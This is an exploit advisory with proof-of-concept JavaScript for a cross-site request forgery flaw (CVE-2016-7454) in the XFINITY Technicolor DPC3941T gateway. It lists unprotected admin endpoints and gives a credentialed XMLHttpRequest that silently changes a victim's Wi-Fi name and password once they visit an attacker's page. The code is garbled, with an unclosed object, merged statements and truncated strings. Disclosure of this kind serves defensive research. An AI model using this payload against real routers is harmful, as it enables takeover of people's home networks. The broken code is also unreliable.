XFINITY Gateway Technicolor DPC3941T Cross Site Request Forgery

XFINITY Gateway Technicolor DPC3941T wifi password changing cross site request forgery proof of concept code.

MD5 | 15a5f462d705cc849d2ab2c6db485d3d

# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco)
# Date: 12/12/2016
# Exploit Author: Ayushman Dutta
# Version: dpc3941-P20-18-v303r20421733-160413a-CMCST
# CVE : CVE-2016-7454

The Device DPC3941T is vulnerable to CSRF and has no security on the entire
admin panel for it.
Some of the links are at:

<IP Address>/actionHandler/ajax_remote_management.php
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
<IP Address>/actionHandler/ajax_at_a_glance.php

A simple HTML page with javascript on which the attacker lures the victim
can be used to change state in the application.

Lets CSRF Xfinity to change Wifi Password
function jsonreq() {
var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",
"network_name":"MyName", "wireless_mode":"a,n,ac",
"channel_automatic":"true", "channel_number":"40",
"network_password":"password", "broadcastSSID":"true", "enableWMM":"true",
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;"POST","
configuration_edit.php", true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-

Related Posts